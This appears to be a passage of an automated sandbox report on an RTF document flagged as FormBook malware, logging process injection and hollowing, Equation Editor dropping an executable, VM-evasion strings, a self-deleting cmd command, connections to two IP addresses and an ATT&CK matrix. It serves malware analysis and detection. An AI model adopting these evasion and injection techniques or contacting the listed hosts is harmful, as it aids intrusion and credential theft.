          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: fqwBU8MyzT.rtfReversingLabs: Detection: 48%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000006.00000002.2151498598.00000000003E0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000009.00000002.2401023696.00000000005D6000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CB48FC push edx; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00417A32 push es; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CEB5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF6C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF02 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF0B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00097A32 push es; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF0B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF02 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF6C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925
          Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE7
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2492, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -420000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 1692Thread sleep time: -50254s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2364Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2880Thread sleep time: -46000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2768Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 824Thread sleep time: -50000s >= -30000s
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.2114119554.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.2114003133.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2107221018.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 146.148.194.209 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.118 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B30000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
